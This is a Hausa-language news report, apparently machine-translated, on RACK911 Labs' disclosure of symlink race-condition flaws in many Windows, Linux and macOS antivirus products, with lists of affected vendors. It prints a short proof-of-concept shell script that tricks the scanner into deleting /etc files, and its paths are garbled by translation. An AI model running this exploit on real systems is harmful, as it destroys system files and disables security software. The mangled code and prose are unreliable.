Masu bincike daga RACK911 Labs cewa kusan duk fakitin riga-kafi na Windows, Linux da macOS sun kasance masu rauni ga hare-haren da ke sarrafa yanayin tsere yayin goge fayilolin da aka gano malware.
Don kai hari, kuna buƙatar loda fayil ɗin da riga-kafi ta gane a matsayin qeta (misali, zaku iya amfani da sa hannun gwaji), kuma bayan wani lokaci, bayan riga-kafi ya gano fayil ɗin ɓarna, amma nan da nan kafin kiran aikin. don share shi, maye gurbin shugabanci tare da fayil tare da hanyar haɗin alama. A kan Windows, don cimma sakamako iri ɗaya, ana yin maye gurbin adireshi ta amfani da mahaɗar adireshi. Matsalar ita ce kusan dukkanin riga-kafi ba su bincika hanyoyin haɗin yanar gizo da kyau ba kuma, gaskanta cewa suna share fayil ɗin qeta, sun share fayil ɗin a cikin kundin adireshi wanda alamar hanyar haɗin ke nunawa.
A cikin Linux da macOS an nuna yadda ta wannan hanyar mai amfani mara amfani zai iya share /etc/passwd ko kowane fayil ɗin tsarin, kuma a cikin Windows ɗakin karatu na DDL na riga-kafi da kansa don toshe aikinsa (a cikin Windows harin yana iyakance kawai don sharewa. fayilolin da wasu aikace-aikacen ba sa amfani da su a halin yanzu). Misali, mai hari zai iya ƙirƙirar kundin adireshi kuma ya loda fayil ɗin EpSecApiLib.dll tare da sa hannun rigar ƙwayar cuta a ciki, sannan ya maye gurbin littafin “exploit” tare da hanyar haɗin “C: Fayilolin Shirin (x86) \ McAfee \ Tsaro na Ƙarshen Ƙarshen Tsaro kafin share shi Platform", wanda zai kai ga cire ɗakin karatu na EpSecApiLib.dll daga kundin riga-kafi. A cikin Linux da macos, ana iya yin irin wannan dabara ta maye gurbin directory tare da hanyar haɗin "/ sauransu".
#! / bin / sh
rm -rf / gida / mai amfani / amfani; mkdir / gida / mai amfani / amfani /
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
yayin da inotifywait -m "/ gida / mai amfani / amfani / passwd" | grep -m 5 "BUDE"
do
rm -rf / gida / mai amfani / amfani; ln -s /etc /home/user/exploit
aikata
Haka kuma, yawancin riga-kafi na Linux da macOS an samo su don amfani da sunayen fayilolin da za a iya faɗi yayin aiki tare da fayilolin wucin gadi a cikin /tmp da / masu zaman kansu / tmp directory, waɗanda za a iya amfani da su don haɓaka gata ga tushen mai amfani.
Ya zuwa yanzu, yawancin masu samar da kayayyaki sun riga sun daidaita matsalolin, amma yana da mahimmanci cewa sanarwar farko game da matsalar an aika zuwa masana'antun a cikin bazara na 2018. Kodayake ba duk dillalai ne suka fitar da sabuntawa ba, an ba su aƙalla watanni 6 don faci, kuma RACK911 Labs ya yi imanin cewa yanzu yana da 'yanci don bayyana raunin. An lura cewa RACK911 Labs ya daɗe yana aiki don gano raunin da ya faru, amma bai yi tsammanin zai yi wuya a yi aiki tare da abokan aiki daga masana'antar riga-kafi ba saboda jinkirin fitar da sabuntawa da kuma watsi da buƙatar gaggawar gyara tsaro. matsaloli.
Abubuwan da abin ya shafa (ba a jera fakitin riga-kafi kyauta ClamAV):
- Linux
- BitDefender GravityZone
- Comodo Endpoint Tsaro
- Tsaron Server na Fayil na Eset
- F-Secure Linux Tsaro
- Kaspersy pointarshen Tsaro
- Tsaron Tsaro na McAfee
- Sophos Anti-Virus don Linux
- Windows
- Anti-virus na Avast Kyauta
- Anti-virus na Avira Kyauta
- BitDefender GravityZone
- Comodo Endpoint Tsaro
- F-Amintaccen Kariyar Kwamfuta
- Tsaron Tsaro na FireEye
- Sakonnin X (Sophos)
- Kaspersky Endpoint Tsaro
- Malwarebytes don Windows
- Tsaron Tsaro na McAfee
- Panda dome
- Tsarin Yanar Gizo na Tsaro Ko'ina
- macOS
- AVG
- BitDefender Total Tsaro
- Eset Cyber Tsaro
- Kaspersky Intanit Intanet
- McAfee Total Kariya
- Microsoft Defender (BETA)
- Tsaro Norton
- Sophos Home
- Tsarin Yanar Gizo na Tsaro Ko'ina
source: budenet.ru